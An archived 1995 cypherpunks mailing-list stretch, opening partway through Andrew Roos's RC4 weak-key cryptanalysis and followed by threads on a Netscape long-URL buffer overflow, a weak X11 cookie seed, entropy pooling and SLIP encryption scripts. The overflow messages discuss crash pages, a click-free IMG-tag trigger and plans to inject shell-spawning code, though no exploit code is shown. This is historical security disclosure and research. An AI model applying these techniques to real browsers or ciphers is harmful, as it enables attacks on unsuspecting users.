1    x = (x + 1) % 256;
2    y = (state[x] + y) % 256;
3    swap_byte(&state[x], &state[y]);   
                                      

4    xorIndex = (state[x] + state[y]) % 256;   
                                 

5    GeneratedByte = state[xorIndex];

One way to exploit our analysis of the state table is to find   
circumstances
under which one or more generated bytes are strongly correlated with a   
small
subset of the key bytes.

Consider what happens when generating the first byte if state[1] == 1.

1    x = (0 + 1) % 256;                  /* x == 1 */
2    y = (state[1] + 0) % 256;           /* y == 1 */
3    swap_byte(&state[1], &state[1]);    /* no effect */
4    xorIndex = (state[1] + state[1]);   /* xorIndex = 2 */
5    GeneratedByte = state[2]

And we know that state[2] is has a high probability of being

     S[2] = K[0] + K[1] + K[2] + 2 (2+1) / 2

Similarly,

     S[1] = K[0] + K[1] + 1 (1+1) / 2

So to make it probable that S[1] == 1, we have:

     K[0] + K[1] == 0 (mod 256)

In which case the most likely value for S[2] is:

     S[2] = K[2] + 3

This allows us to identify a class of weak keys:

C.   Given an RC4 key K[0]..K[N] with K[0] + K[1] == 0 (mod 256), there   
is a
     significant probability that the first byte generated by RC4 will be   

     K[2] + 3 (mod 256).

Note that there are two special cases, caused by "unexpected" swapping   
during
key generation. When K[0]==1, the "expected" output byte is k[2] + 2, and   
when
k[0]==2, the expected value is k[2] + 1.

There are a number of similar classes of "weak keys" which only affect a   
few
keys out of every 65536. However the particular symmetry in this class   
means
that it affects one key in 256, making it the most interesting instance.

Once again I took the easy way out and used simulation to determine the
approximate probability that result C holds for any given key.   
Probabilities
ranged between 12% and 16% depending on the values of K[0] and K[1], with   
a
mean of about 13.8%. All these figures are significantly greater than the   

0.39% which would be expected from an uncorrelated generator. The key   
length
used was again 80 bits. This works the other way around as well: given   
the
first byte B[0] generated by a weak key, the probability that   
K[2]==B[0]-3
(mod 256) is 13.8%.

       

4.  EXPLOITING WEAK KEYS IN RC4

Having found a class of weak keys, we need a practical way to attack RC4   
based
cryptosystems using them. The most obvious way would be to search   
potential
weak keys first during an exhaustive attack. However since only one in   
every
256 keys is weak, the effective reduction in search space is not   
particularly
significant.

The usefulness of weak keys does increase if the opponent is satisfied   
with
recovering only a percentage of the keys subjected to analysis. Given a   
known
generator output which includes the first generated byte, one could   
assume
that the key was weak and search only the weak keys which would generate   
the
known initial byte. Since 1 in 256 keys is weak, and there is a 13.8%   
chance
that the assumed value of K[2] will be correct, there is only a 0.054%   
chance
of finding the key this way. However, you have reduced the search space   
by 16
bits due to the assumed relationship between K[0] and K[1] and the   
assumed
value of K[2], so the work factor per key recovered is reduced by a   
factor of
35, which is equivalent reducing the effective key length by 5.1 bits.

However in particular circumstances, the known relationships between weak   
keys
may provide a much more significant reduction in workload. The remainder   
of
this section describes an attack which, although requiring very specific
conditions, illustrates the potential threat.

As a stream cipher, a particular RC4 key can only be used once. When   
multiple
communications sessions are required, some mechanism must be provided for   

generating a new session key each time. Let us suppose that an   
implementation
chose the simple method of incrementing the previous session key to get   
the
new session key, and that the session key was treated as a "little   
endian"
(least significant byte first) integer for this purpose.

We now have the interesting situation that the session keys will "cycle
through" weak keys in a pattern which repeats every 2^16 keys:

00 00 00 ...    Weak
(510 non-weak keys)
FF 01 00 ...    Weak
(254 non-weak keys)
FE 02 00 ...    Weak
(254 non-weak keys)
FD 03 00 ...    Weak
...
01 FF 00 ...    Weak
(254 non-weak keys)
00 00 01 ...    Weak
(510 non-weak keys)
FF 01 01 ...    Weak

(Least significant byte on the left)

Now while an isolated weak key cannot be identified simply from a known
generator output, this cycle of weak keys at known intervals can be   
identified
using statistical techniques since each of the weak keys has a higher   
than
expected probability of generating the _same_ initial byte. This means   
that an
opponent who knew the initial generated bytes of about 2^16 session keys   
could
identify the weak keys, and would also be able to locate the 510-key gap
between successive cycles of weak keys (although not precisely). Since   
the
510-key gap occurs immediately following a key which begins with 00 00,   
the
opponent not only knows that the keys are weak, but also knows the first   
two
bytes of each key. The third byte of each key can be guessed from the   
first
output byte generated by the key, with a 13.8% chance of a correct guess.   

Assuming that the "510-key gap" is narrowed down to 1 of 8 weak keys, the   

attacker can search a key space which is 24 bits less than the size of   
the
session keys, with a 13.8%/8 chance of success, effectively reducing the   
key
space by approximately 18 bits.

Although this particular attack depends on a very specific set of
circumstances, it is likely that other RC4 based cryptosystems in which   
there
are linear relationships between successive session keys could be   
vulnerable
to similar attacks.


5.  RECOMMENDATIONS

The attacks described in this algorithm result from inadequate "mixing"   
of key
bytes during the generation of the RC4 state table. The following   
measures
could be taken to strengthen cryptosystems based on the RC4 algorithm:

(a) After initializing the algorithm, generate and discard a number of   
bytes.
    Since the algorithm used to generate bytes also introduces additional   

    non-linear dependencies into the state table, this would make   
analysis
    more difficult.

(b) In systems which require multiple session keys, ensure that session   
keys
    are not linearly related to each other.

(c) Avoid using the weak keys described.


6.  CONCLUSION

This preliminary analysis of RC4 shows that the algorithm is vulnerable   
to
analytic attacks based on statistical analysis of its state table. It is
likely that a more detailed analysis of the algorithm will reveal more
effective ways to exploit the weaknesses described.



Andrew Roos <andrewr@vironix.co.za>

 -----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGLAk2atuqa4OR+lAQGYJQQA1W2r/giH1iPxeLRjooPEvAJJO2GHrBNy
h1fjHhPf6uBhBapEyZfN5utaUZYkkz/3tXJQC1p+17XwAJHGxb6kapHl3tAf2k5B
P7C034fo8WIOmam1GQqlG3c1MPjCvkNY02NEkYAmNtcwKMP96QgDMCbvS0kn55WE
L1GOWMVYqO4=
=iogI
 -----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 22 Sep 95 03:10:38 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: Netscape to end Linux support?
In-Reply-To: <199509212125.RAA00188@hoopsnake.cjs.net>
Message-ID: <9509221008.AA18570@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Simmons writes:
 > > And the sad part is that now that they have announced that they are
 > > dropping their unofficial Linux support, I really want to hurt
 > > Netscape badly.
 > > Sigh.
 > Anyone got a pointer to this announcement?
 > Damn!  Just when I was starting to like them ...

Hmm, I was also thinking good about responsiveness on the security
issue (though the way they behave regarding html extensions is still
not fair imo, but that's another debate), and I have modified my
netscape security page accordingly, but, dropping Linux as the list of
UNIX supported host is certainly not a good thing at all, I
urge/pray/suggest... that listening Netscape folks here try to put
it back, PLEASE (It is not that difficult to compile under linux is it ?)

(source :
http://www.netscape.com/comprod/products/navigator/version_2.0/datasheet.html
[...]
SUPPORTED PLATFORMS 
[...]
UNIX: 
            Digital Equipment Corp. Alpha (OSF/1 2.0) 
            Hewlett-Packard 700-series (HP-UX 9.03) 
            IBM RS/6000 AIX 3.2 
            Silicon Graphics (IRIX 5.2) 
            Sun SPARC (Solaris 2.4, SunOS 4.1.3) 
            386/486/Pentium (BSDI) 
)
Or maybe it is just a missing item in the list ? [i hope!]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Saddam Hussein Qaddafi [Hello to all my fans in domestic surveillance]
genetic Cocaine radar Ortega




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 22 Sep 95 03:15:46 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <9509221014.AA18627@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell writes:
 > 
 > I've found a Netscape bug which I suspect is a buffer overflow and
 > may have the potential for serious damage. If it is an overflow bug,
 > then it may be possible to infect every computer which accesses a web
 > page with Netscape. To see the bug, create an html file containing
 > the following:
[...]
The sortest host length I've found to cause seg fault is 356 (yes, and
not 256, 256+100 if you prefer :))
You can have a look at http://hplyot.obspm.fr/~dl/netscapesec/ for a
'demo' (click to crash)


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Legion of Doom SEAL Team 6 Cocaine class struggle AK-47 jihad
fissionable




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Fri, 22 Sep 95 12:21:44 PDT
To: cypherpunks@toad.com
Subject: Netscape for Linux
Message-ID: <199509221917.MAA07561@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Found this on Comp.os.linux.misc - hope it's true:


Tobias Engel <s120808@fb1.fhtw-berlin.de> writes:

>I looked at the Data Sheet-Page for the Netscape Navigator 2.0 today (http://home.netscape.com/comprod/products/navigator/version_2.0/datasheet.html).
>There is a "Supported Platforms"-List at the end of the Page. For Unix it
>says:
>---
>Digital Equipment Corp. Alpha (OSF/1 2.0) 
>Hewlett-Packard 700-series (HP-UX 9.03) 
>IBM RS/6000 AIX 3.2 
>Silicon Graphics (IRIX 5.2) 
>Sun SPARC (Solaris 2.4, SunOS 4.1.3) 
>386/486/Pentium (BSDI) 
>---

>So, where is Linux???

In comp.infosystems.www.browsers.x Jamie Zawinski <jwz@netscape.com>
said that there *will* be a 2.0 version for Linux.  He also explained
why Linux isn't listed and why Netscape will tell you that there
will not be a supported version of Netscape for Linux.
This is a copy of that article, which is worth reposting here, I think,
because of the large threads about this subjects:


From: Jamie Zawinski <jwz@netscape.com>
Newsgroups: comp.infosystems.www.browsers.x
Subject: Re: Netscape 2.0 for Linux
Organization: Netscape Communications
Date: Wed, 20 Sep 1995 16:11:19 -0700

Marco Trincardi wrote:
>
> There will be a Linux version of the new upcoming Netscape 2.0 ???
> At Netscape HomePage i didnt find usefull info.

And I replied:
> 
> Yes, once 2.0 is released (please don't ask me when) it will be
> available for all platforms on which 1.1 is available.

Since then, it would seem that some folks have called our customer
support lines and gotten a seemingly different answer, so allow me to
clarify:

When someone in customer support tells you "we will not be supporting
Linux in Netscape 2.0," they're right: but that's because we didn't
support it in 1.0 or 1.1 either.  "Support" means we sell the software,
and you can buy a support contract.  This is not, and has never been the
case for Linux.  You have never been able to get a *supported* version
of Netscape Navigator for Linux.  We have no Linux *product*; our sales
and support folks don't deal with it in any way, and never have.

However, there has been an unsupported educational/evaluation version
available for that platform, and this will also be the case for 2.0.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/


-- 
--    Jos Vos <jos@xos.nl>
--    X/OS Experts in Open Systems BV   |   Phone: +31 20 6938364
--    Amsterdam, The Netherlands        |     Fax: +31 20 6948204




-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 22 Sep 95 10:38:08 PDT
To: cypherpunks@toad.com
Subject: Netscape bug and the IMG tag.
Message-ID: <v01510100ac88b1f03e28@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

You can plunk a nasty url into the SRC field of an IMG tag, thus eliminating
the need for clicking on the offending url. Also, it makes it harder to
check the html of a page. Check out http://www.redweb.com/experiment/bug2
html if you feel like rebooting.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMGMCc3If3YegbdiBAQFTMgJYsAEPkSWTtGDswAYpT1repQjd8n3unMg3
CIXNlxmg43BkMgyNRrqYP2P61aMJt4FwPZt+PgE4NYxVj6PzaPtsf/Y/6BSsWNxb
cKcr
=/ORS
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arve Kjoelen <akjoele@shiva.ee.siue.edu>
Date: Fri, 22 Sep 95 10:42:02 PDT
To: cypherpunks@toad.com
Subject: Re: XDM has the same problem as netscape ?!
Message-ID: <199509221741.MAA27447@shiva.ee.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:

>Nelson Minar <nelson@santafe.edu> wrote:
>>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
>>the same problem: the random seed was based on the current time to the
>>microsecond, modulo the granularity of the system clock. I think I
>>figured that on my hardware, if I could figure out which minute the X
>>server started (easy with finger), I'd only have to try a few
>>thousand keys or so. Caveat: I never actually proved the idea.

>Wow.  I just checked, and Nelson's right.
>[ code extracts snipped]

I just checked X11R6, and the same method is used there, so it hasn't changed
since X11R4.

-Arve.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 22 Sep 95 12:52:58 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <v02120d01ac88cf556dd4@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Spent too much time last night playing with the Netscape bug;
among other things wrote some code to throw various random binary
URLs at Netscape. Netscape seems prepared to swallow the bait
as long as the URL does _not_ contain characters screened as
follows:

 if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {

This means you can't plant 0x00, 0x22, 0x3e or 0x2f.

Anything else can be made to show up in various registers
after things go blooey.  I've only made it segfault in
different places so far, still working on getting it to do
something it wouldn't ordinarily do and not crash before
it does it.

[Working under Solaris 2.4; I may try my luck on Macs, since
this bug crashes the whole OS... need to load up debug tools
first though.]

Hope this helps others...

Doug






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 22 Sep 95 10:04:27 PDT
To: cypherpunks@toad.com
Subject: Defense against a class of programming bugs
Message-ID: <9509221703.AA22917@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


In light of the continuing vulnerability to long user input, I humbly
offer the following aphorism, suitable for display on all Netscape
programmer cubicles:
	Copy strings with strdup, not strcpy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Thu, 21 Sep 95 20:14:06 PDT
To: cwe@Csli.Stanford.EDU (Christian Wettergren)
Subject: Re: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509211852.LAA22259@Csli.Stanford.EDU>
Message-ID: <199509220312.NAA15933@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello stewarts@ix.netcom.com, cypherpunks@toad.com, jsw@netscape.com
  and Christian Wettergren <cwe@Csli.Stanford.EDU>

Christian Wettergren <cwe@Csli.Stanford.EDU> wrote:
...
> | If I only ever give out a hash of my seed, and only ever *add* any received
> | info to my seed (and stir it in well), how can anyone find out anything?
> | (Apart from hash weaknesses.)
> 
> Giving out contribution: 
>      MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
> Taking in contribution : 
>      my_seed = my_seed XOR 
>      ((select_low_bits(remote_contrib, contrib_width) << contrib_area)

Hmm, I use:
  taking-in:
	seed = MD5(seed,new-data)
  giving-out:
	MD5(seed)

(where every giving-out is preceded by a taking-in). Is that OK?
If not, why not and how can I improve it?

> You also need to keep track of who has contributed what, and how much.
...

Why? I guess to keep track of how much entropy I believe I have...

> This might become a problem if you don't have a safe authentification
> mechanism, like baseing the tracking on the IP-numbers etc.

That's a safe authentication mechanism? I don't think so.
But you need a secrecy mechanism, so I guess that's where you'd
add your auth.

...
> The boot-strap stage is actually the big problem still. But if the
...

The boot-strap is done only once (at install time) so it's not a big
problem to ask for lots of random text from user.

...
> | In any case, accepting donations of entropy cannot possibly reduce the
> | amount of entropy I have, can it?
> 
> This isn't a problem as I see it, he'll only know what bits he
> flipped, not the actual state.

Good, I thought so.

Sorry, have to go now, rest later...

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGIpgixV6mvvBgf5AQGRggQAwEcY+5N0stTbWXfXg3zQ6FNdzv9Sckds
3xAjLbxr85jS98Sj0Nm++DwS674U8YfrNzTRg3HnOBUcS+i8UvP445jtj4UiyxU8
hyM2ZvzBWjFuj35jXF4KR5XotZyvAsAcICsssv0UQZ3JKWV+tU/pN8sZ3sgKRRWZ
ipvAFyY+rhA=
=1d8P
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 10:14:04 PDT
To: perry@piermont.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com>
Message-ID: <199509221713.NAA11980@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> > These buffer overflow bugs should be taught in every programming
> > 101 course along with fencepost errors.
> > 
> > I'm not even sure if I want to write the obligatory program to exploit
> > the hack given that some malicious jerk would probably use it
> > on his home page to attack people.
> 
> The problem is that if you don't produce a (benign) exploit people
> aren't going to take it seriously enough.

  Yeah, I guessed that. I'll work on it, I have a few doubts I have
to research first. For instance, how to embed code in the domain that
1) server/client processing won't "cook" and 2) contains no isolated
zero bytes which would null terminate the string.

  My current idea is to look in Netscape for an "exec" routine,
and call it passing a "/bin/csh" to it.

  Irregardless, it's a nasty bug given that you can crash anyone's
netscape. And on Mac/Win3.1, it may even require a reboot.

-Ray
 

 

  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 22 Sep 95 10:18:08 PDT
To: "Dietrich J. Kappe" <goedel@tezcat.com>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v01510100ac8821ac2b23@[206.1.161.4]>
Message-ID: <Pine.SUN.3.91.950922131402.16290E-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Dietrich J. Kappe wrote:

> Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
> it out, I've put up a simple page with the url at
> http://www.redweb.com/experiment/bug.html

Netscape also crashes (error 1) on regular Macs...sigh.  I'm contacting 
someone who just wrote a http server to see how tough it would be drop 
some code on the stack.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjsus@atlanta.com
Date: Fri, 22 Sep 95 10:23:09 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: business intelligence or BI
Message-ID: <199509221726.NAA17033@atlanta.com>
MIME-Version: 1.0
Content-Type: text/plain


>It's important here to distinguish economic "espionage" and economic
>"intelligence."
>

There is also the difference between the business intelligence and business
espionage !

The business intelligence is used to collect, evaluate, analyze etc. the
business information and data that may include competitors, markets,
economic trends, suppliers among others. The sources of this information are
publicly and legally available for all companies and individuals. The formal
or informal business intelligence system can be used. The successful use of
the traditional business intelligence will result in the best results, when
this information and data is eveluated, analyzed and disseminated in the
most intelligent, reliable, timely and accurate manner. 100% of companies
are already using the business intelligence (all companies are just not
calling it the BI): some more successfully than others. The business
intelligence can be used both for strategic and tactical purposes.

                                                        Regards,

                                                        Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Fri, 22 Sep 95 10:20:35 PDT
To: cypherpunks@toad.com
Subject: (noise) Subject: Married with Children (was: Re: Netscape closes up 1 3/8 today!)
Message-ID: <199509221720.NAA17055@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Christopher J. Shaulis <cjs@netcom.com> writes:

> Yeah. Thats the way it works sometimes. I remember back when that
> housewife from minnasota launched her media campaign to have "Married
> With Children" taken off the air. All it did was make the show a
> hundred times more popular and extend its life for years after it
> probably would have been canceled on its own.

Terry Rakolta is from Bloomfield Hills, Michigan, just a few short miles
from where I sit, typing at my keyboard.  After being offended by the
episode "Her Cups Runneth Over", Rakolta took notes on things she found
offensive in subsequent episodes and then mailed a complaint to Fox.

Fox's reaction?  According to executive producer Michael Moye, "Everybody
did the manly thing which was immediately dive behind desks and point the
finger at us.  You couldn't get your legs under a desk for all the
executives under there.  You have never seen such wussing.  And we're
going, 'One letter?  *One letter?*'"  [emphasis his]

The resulting media incident almost certainly increased the show's
ratings, but it also brought the wrath of the Fox censor down on the
producers.  For an interesting account of this, see Playboy, July 1990,
(the one with Sharon Stone topless on the cover ;), "Hanging out with
the Bundys", Pamela Marin, p.114 et seq.

Something else which has happened here in the Greater Detroit SMSA, just
in the last few days, is the mother of a ten year old boy has demanded
that _The_Stand_ by Stephen King be removed from the school's library
after her son checked it out from said library.  Turns out Stephen
included some graphic descriptions of sex.  The punch line, if you like,
is that in tv news coverage the young lad was shown sitting in front of
the tv, playing a Mario-like video game.

Thank God they got that book away from him just in the nick of time, eh?
He might be reading even as we speak!

        They walked still further and the girl said, "Is it true that
    long ago firemen put fires *out* instead of going to start them?"
        "No."
                                                       -- Ray Bradbury


``Officer, officer, arrest that man!  He's whistling a dirty song.''
                                                       -- Jean Ellison

Crypto relevance?  None.

drc

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGLunREcrOJethBVAQFnbwP/SI1df4BtSIOZryK+pcoatMy7jePQQF4W
fj6cONy6ulf/0KqswS1md91qZMUKJ0EpCJGf+qbaXTblASCZ08spGlgZ3rp0yYiK
wGlWEHxatgqbrSO6XKJAEAIccd2aArtpnWPBfnnXpCGaSXQ4lLrg+/a3b+q9JZ9m
BvLSyhaTqkM=
=Ijia
-----END PGP SIGNATURE-----

--
David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Fri, 22 Sep 95 10:24:42 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <199509221724.NAA18084@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Jeff Weinstein <jsw@neon.netscape.com> writes:

>   Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?

Lynx can handle it on the info page (reached by pressing '='), but:

In response to selecting the long domain name found in the Warning link in
http://www.grfn.org/~conrad/test.shtml, lynx replied:

- - -

Sorry, you have encountered a bug in Lynx Ver. 2-4-2

Please send a concise mail message to
lynx-bug@ukanaix.cc.ukans.edu describing what you were doing,
the URL you were looking at or attempting to access,
your operating system name with version number,
the TCP/IP implementation that your system is using,
and any other information you deem relevant.

Do not mail the core file if one was generated.

Lynx now exiting with signal:  11


Exiting via interrupt: exit(0)

- - -

[No core file was generated]

My system is: (uname -a)

Linux russell 1.3.26 #2 Thu Sep 14 08:34:38 EDT 1995 i486

Netscape 1.1N for linux crashed in a way that locked my system up, and
caused endless trashing.  I had to reboot, but my filesystem was
undamaged.  Not sure why it crashed and burned on my system while others
have gotten such nice SegVs and core files.  I guess I managed to get
just the right (wrong) thing onto the stack.  :-)  :-(

(P.S. Whoops, just realized that I rebooted with a different kernel;
Lynx did indeed crash under 1.3.26 (post-reboot), but Netscape crashed
under 1.2.13 (pre-reboot).  Pardon me if I don't re-try under 1.3.26,
but having X lock up and hearing my disk trash is not something I relish.)

drc

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGLu1BEcrOJethBVAQEhwwP/cPZ2Gr/MClaywXEAtagNa7n5IyIsqFGI
LmCDxjTMdK/zXzuPcU3Xa53QxOn4dSxQv2PRKHrLGSrVn5vvZHRiYmH5z4NgWvmJ
ETFlFascANzqN2VbHgrn80u3RlFIH0UAUiTgoIFiJ4E3TUzrmt5w4qeXxvfA9PKQ
LQi2oeIArS8=
=EEup
-----END PGP SIGNATURE-----

Last line above should read: "hearing my disk *thrash* ...," not trash.
Signing messages is non-trivial with my current set up, so I don't feel
like re-doing it for such a minor glitch.

--
David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 10:29:48 PDT
To: cypherpunks@toad.com
Subject: YET ANOTHER BAD NETSCAPE BUG (no it isnt!)
Message-ID: <199509221729.NAA16470@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Just another reminder that the second bug I posted about was a fluke
on my system and not a real bug. I'm hoping that putting the reminder
in the subject will stop people from forwarding it on to other
lists before reading the retraction. Although this was a false bug,
the overflow bug is very real and verified.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@utopia.hacktic.nl (Matthew Ghio)
Date: Fri, 22 Sep 95 10:59:07 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto Sync Issue
In-Reply-To: <199509191846.LAA24272@netcom4.netcom.com>
Message-ID: <m0swC6B-0012rZC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Tom Rollins <kelso@netcom.com> wrote:

> I am interested in encrypting a SLIP link between my
> PC (running Linux) and my Netcom shell account (running
> SLIRP).
> 
> My question has to do with error conditions on the line.
> If I drop a character or packet, the two sides will loose
> crypto sync and result in things scrambled from then on.
> The modems will fix most of the low level problems.
> However, Murphy's Law has not been repealed. :)
> 
> Are there any standard methods to provide the SYNC between
> the sender(encryption) and the receiver(decryption) on
> an Async connection ?
> 
> Since Slip uses IP packets, I was planning on an encryption
> of the data portion of the IP packets (leaving the header
> alone).

A better approach would be to encrypt the entire IP packets and leave the
framing bytes alone.  

But this is what I do:

I use regular unencrypted SLIP (slirp) between here and netcom.
Also install copies of slirp in all your other unix accounts, plus your
favorite session encryption daemon (deslogin, ctcp, ssh, esm, etc).
Then make some script files like this.  For this example I use deslogin
to establish a secure session with utopia.hacktic.nl.

/root/dialup:

#!/bin/csh
dip /root/netcom.dip
/sbin/agetty 38400 ttyqf -l /root/utopiadeslogin &
dip /root/utopia.dip

/root/utopiadeslogin:

#!/bin/csh
exec /usr/local/bin/deslogin ghio@utopia.hacktic.nl

/root/utopia.dip:

port ptyqf
wait ogin: 60
send anything\n
wait d: 5
send password\n
wait ] 5
send \n
send exec slirp-0.9o/src/slirp\n
get $rmtip 10.0.2.42
get $locip 10.0.2.16
mode CSLIP


Add to /etc/hosts:

10.0.2.42       utopia-secure


Then I can do: telnet utopia-secure
and everything is encrypted.

I got deslogin from utopia's anon-ftp dir.
A 3DES version would be nice tho.

When you want to hangup, use this to kill all of the dip processes:

#!/bin/csh
ps -ua|grep " pQf "|awk '{print "kill " $2}'|csh
ps -ua|grep " pS1 "|awk '{print "kill " $2}'|csh


To do this for more hosts, just pick any available IP addresses
in 10.0.2.x and a free tty (ttyq* are usually unused).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 22 Sep 95 13:49:15 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <v02120d04ac88df3d2a8d@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>>
>>
>> Spent too much time last night playing with the Netscape bug;
>> among other things wrote some code to throw various random binary
>> URLs at Netscape. Netscape seems prepared to swallow the bait
>> as long as the URL does _not_ contain characters screened as
>> follows:
>>
>>  if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {
>>
>> This means you can't plant 0x00, 0x22, 0x3e or 0x2f.
>
>   Did you check 0x20 and 0xa0?  (space and shift-space) I'm sure
>that a space will terminate the href in <a>.
>

This seems not to be the case.
See: http://www.communities.com/foo/bad.html (which contains these
bytes fairly early in the sequence, and still does a lovely job
of crashing.)

Showed the bug to EC's president, he immediately wanted to try
it. It completely blew his PPC Mac (I've got a Powerbook 540C)
out of the water. (Error of type 11, dialog with only
the restart button.) My powerbook hangs on for a bit and then
locks up.

Onward to the exploit!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 22 Sep 95 10:56:39 PDT
To: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <199509221756.NAA15178@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:17 PM 9/22/95 -0400, Thomas Grant Edwards wrote:
>On Fri, 22 Sep 1995, Dietrich J. Kappe wrote:
>
>> Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
>> it out, I've put up a simple page with the url at
>> http://www.redweb.com/experiment/bug.html
>
>Netscape also crashes (error 1) on regular Macs...sigh.  I'm contacting 
>someone who just wrote a http server to see how tough it would be drop 
>some code on the stack.
>
>-Thomas


On my 486 running Windoze for Workgroups 3.11 and the latest Netscape Beta
it causes Netscape to die but doesn't lock me up.  

Generally I've found Netscape blows up in a much firendlier way than other
Windoze programs.  I can often recover the Netscape session itself and it
doesn't lock me up as much.

DCF
>
>
>





